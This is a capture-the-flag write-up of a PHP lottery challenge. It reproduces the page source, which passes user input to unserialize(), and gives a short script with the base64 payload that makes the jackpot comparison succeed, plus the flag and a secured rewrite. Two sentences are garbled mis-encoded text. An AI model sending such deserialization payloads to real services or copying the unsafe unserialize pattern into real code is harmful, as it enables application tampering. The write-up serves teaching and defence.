💉 TSULOTT

Easy

Overview

At the start there are two input fields: one where you enter your code to win the jackpot, and one where you enter 6 numbers to get a code.

Here we can type anything, but first we enter something in the Take code field and grab the base64 string the page gives back; submitting it returns a result like the image below.

Analysis

After a while we look at what the current page source contains with Ctrl+U.

There is a hint for us here: GET /?is_debug=1. After requesting it we get the challenge's source code as follows:

<body>
<style>
input[type=text] {
    width: 40%;
    padding: 12px 20px;
    margin: 8px 0;
    box-sizing: border-box;
    border: 2px solid red;
    background-color: #ebfff8;
    border-radius: 4px;
}

button[type=submit] {
    width: 10%;
    background-color: #F94848;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button[type=submit]:hover {
    background-color: #45a049;
}

body {
    background-image: url("money.jpg");
}
</style>

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
          <input type="text" name="input" /><p><p>
          <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
  $temp = new Object;
  $temp->enter=$_GET['gen_code'];
  $code=base64_encode(serialize($temp)); 
  echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font><p>
<form>
      <input type="text" name="gen_code" maxlength="17" /><p><p>
      <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<!-- debug: GET is_debug=1 -->
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
   show_source(__FILE__);
}
?>
</body>

We pay attention to the following two PHP snippets:

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>

ฤoแบกn code php thแปฉ nhแบฅt cรณ mแป™t class Object cรณ hai thuแป™c tรญnh lร  jackpot vร  enter.

Next, note line 16: it unserializes the code we submit as input and assigns the result to the variable $obj. It then checks whether $obj is set, and if so randomizes jackpot into 6 numbers, each random from 10 to 99 and separated by spaces.

Finally, if the enter property equals jackpot, we can get the flag.

Further down there is another snippet that serializes the content we enter in the lower field.

In short, we now realize this is PHP deserialization, which means we can control the whole Object class above by overwriting it so that the two properties jackpot and enter are equal.

Exploit

ร tฦฐแปŸng bรขy giแป chรบng ta sแบฝ xรขy dแปฑng lแบกi class Object giแป‘ng nhฦฐ trรชn vร  khแปŸi tแบกo hร m __constructor cho hai thuแป™c tรญnh bแบฑng nhau.

<?php
class Exploit
{
    var $jackpot;
    var $enter;

    public function __construct()
    {
        // both properties are still NULL here, so they serialize as N; and compare equal
        $this->jackpot=$this->enter;
    }

}
$code = new Exploit();
echo base64_encode(serialize($code));
//Tzo3OiJFeHBsb2l0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9
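The same jackpot check rewritten so that the six numbers are taken as plain text and user input never reaches unserialize(), as an added example that is not part of the original writeup; the function names parse_six_numbers, draw_jackpot and lott_check are my own.

```php
<?php
// Added example (not the challenge's code): the jackpot check with no unserialize().
// Function names are my own.
//
// Why the original is unsafe: $_GET['input'] goes straight to unserialize(), so the
// client picks the class name and every property. The "Exploit" class in the payload
// above does not exist server-side; on PHP 7 and earlier that gives a
// __PHP_Incomplete_Class whose property writes are dropped and whose reads return
// NULL, so $obj->enter === $obj->jackpot is NULL === NULL. allowed_classes would not
// help: an unlisted class becomes __PHP_Incomplete_Class too.

// The game only needs six two-digit numbers, so accept exactly that and nothing else.
function parse_six_numbers(string $raw): ?string
{
    // same "NN NN NN NN NN NN" shape that draw_jackpot() produces
    if (!preg_match('/^[1-9][0-9]( [1-9][0-9]){5}$/', $raw)) {
        return null;
    }
    return $raw;
}

function draw_jackpot(): string
{
    $nums = [];
    for ($i = 0; $i < 6; $i++) {
        $nums[] = random_int(10, 99);   // CSPRNG; rand() is predictable
    }
    return implode(' ', $nums);
}

// true only when the player's guess matches the freshly drawn jackpot
function lott_check(string $raw, string $jackpot): bool
{
    $enter = parse_six_numbers($raw);
    if ($enter === null) {
        return false;               // malformed input, including any serialized object
    }
    return hash_equals($jackpot, $enter);
}

// Usage as the original page would call it; the "Take code" field is no longer needed.
$jackpot = draw_jackpot();
$raw = $_GET['input'] ?? '';
if (lott_check($raw, $jackpot)) {
    echo "CONGRATULATION! You Won JACKPOT PriZe !!! " . htmlspecialchars($jackpot);
} else {
    echo "Wrong! True Six Numbers Are: " . htmlspecialchars($jackpot);
}
```

The regex rejects anything that is not six space-separated two-digit numbers, so a base64 blob or a serialized object is refused before any comparison happens.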

Flag: MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}
